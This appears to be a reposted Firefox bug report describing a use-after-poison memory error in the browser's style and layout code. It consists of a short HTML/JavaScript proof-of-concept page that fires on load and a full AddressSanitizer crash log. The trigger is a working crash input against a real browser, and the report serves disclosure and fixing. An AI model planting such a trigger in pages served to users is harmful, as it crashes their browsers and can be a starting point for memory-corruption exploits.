Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340593
There is a use-after-poison issue in Firefox. The vulnerability was confirmed on the nightly ASan build.
PoC:
```
<style>
* { padding: inherit; }
</style>
<script>
function go() {
var s = menu.style;
s.setProperty("scroll-snap-destination", "1px 63%");
s.setProperty("padding-left", "66%");
button.scrollBy({left: 60, top: -1});
th.vAlign = "top";
s.setProperty("animation-fill-mode", "forwards");
}
</script>
<body onload=go()>
<button id="button" hidden="hidden"></button>
<table>
<th id="th">foo</th>
<menu id="menu">
<menu>foo</menu>
```
ASan log:
```
==78996==ERROR: AddressSanitizer: use-after-poison on address 0x625000b05790 at pc 0x7efe7287f223 bp 0x7ffc444d1e00 sp 0x7ffc444d1df8
READ of size 1 at 0x625000b05790 thread T0
#0 0x7efe7287f222 in ConvertsToLength /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43
#1 0x7efe7287f222 in nsStylePadding::GetPadding(nsMargin&) const /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:1070
#2 0x7efe728899b9 in mozilla::SizeComputationInput::ComputePadding(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2921:25
#3 0x7efe72872d9f in mozilla::SizeComputationInput::InitOffsets(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*, mozilla::SizeComputationInput::ReflowInputFlags, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2548:23
#4 0x7efe72879162 in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::LogicalSize const&, nsMargin const*, nsMargin const*, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2226:5
#5 0x7efe728712b4 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::LogicalSize const*, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:399:3
#6 0x7efe728dde05 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:166:25
#7 0x7efe728ddf90 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:175:17
#8 0x7efe728d4fae in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3298:7
#9 0x7efe728c9606 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
#10 0x7efe728c9606 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2368
#11 0x7efe728bfc92 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
#12 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
#13 0x7efe72921a52 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
#14 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
#15 0x7efe729c7e3a in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
#16 0x7efe729c92b0 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
#17 0x7efe729ccadb in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
#18 0x7efe72933792 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
#19 0x7efe728a5759 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
#20 0x7efe726a64dc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9260:3
#21 0x7efe726b9f44 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9433:24
#22 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
#23 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
#24 0x7efe72634121 in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2203:5
#25 0x7efe726295b0 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1842:7
#26 0x7efe726339fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2137:5
#27 0x7efe6dd939a7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
#28 0x7efe6de7cefb in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:584:5
#29 0x7efe6d1e3f71 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1537:20
#30 0x7efe6cba8fb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
#31 0x7efe6cba54ec in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
#32 0x7efe6cba7b24 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
#33 0x7efe6cba816e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
#34 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#35 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#36 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#37 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#38 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#39 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#40 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#41 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#42 0x7efe7575ac0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#43 0x7efe7575c708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#44 0x7efe7575d9cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#45 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#46 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#47 0x7efe8714882f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#48 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)
0x625000b05790 is located 5776 bytes inside of 8192-byte region [0x625000b04100,0x625000b06100)
allocated by thread T0 here:
#0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x7efe84725a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
#2 0x7efe72620fc1 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
#3 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
#4 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
#5 0x7efe72513c24 in operator new /home/worker/workspace/build/src/layout/style/nsRuleNode.h:152
#6 0x7efe72513c24 in SetStyleData /home/worker/workspace/build/src/layout/style/nsRuleNode.h:303
#7 0x7efe72513c24 in PropagateDependentBit /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1904
#8 0x7efe72513c24 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2566
#9 0x7efe724e3f47 in nsStyleTextReset const* nsRuleNode::GetStyleTextReset<true>(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
#10 0x7efe72582d6f in DoGetStyleTextReset<true> /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
#11 0x7efe72582d6f in StyleTextReset /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92
#12 0x7efe72582d6f in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:706
#13 0x7efe72582b76 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
#14 0x7efe72582b76 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed<nsRuleNode>, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
#15 0x7efe72591449 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
#16 0x7efe725b318f in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
#17 0x7efe725b80d9 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
#18 0x7efe725b78cc in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
#19 0x7efe725b78cc in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
#20 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
#21 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
#22 0x7efe7276d06c in nsCSSFrameConstructor::MaybeRecreateFramesForElement(mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9331
#23 0x7efe726687fc in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:164:7
#24 0x7efe726f57d3 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
#25 0x7efe726f57d3 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
#26 0x7efe7266c9bf in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
#27 0x7efe7266c9bf in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
#28 0x7efe726b8bdb in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
#29 0x7efe726b8bdb in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4197
#30 0x7efe726a7e80 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/PresShell.cpp:4073:3
#31 0x7efe726a7e80 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/PresShell.cpp:4041
#32 0x7efe726a7e80 in mozilla::PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9088
#33 0x7efe726ba0e9 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9445:7
#34 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
#35 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
#36 0x7efe72638d25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
#37 0x7efe726389e2 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:326:5
#38 0x7efe7263b063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
#39 0x7efe7263b063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
#40 0x7efe72636157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
#41 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#42 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#43 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#44 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#45 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#46 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#47 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#48 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
SUMMARY: AddressSanitizer: use-after-poison /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43 in ConvertsToLength
Shadow bytes around the buggy address:
0x0c4a80158aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a80158af0: 00 00[f7]f7 f7 f7 f7 00 00 00 00 00 00 00 00 00
0x0c4a80158b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
京公网安备 11010502034610号
暂无评论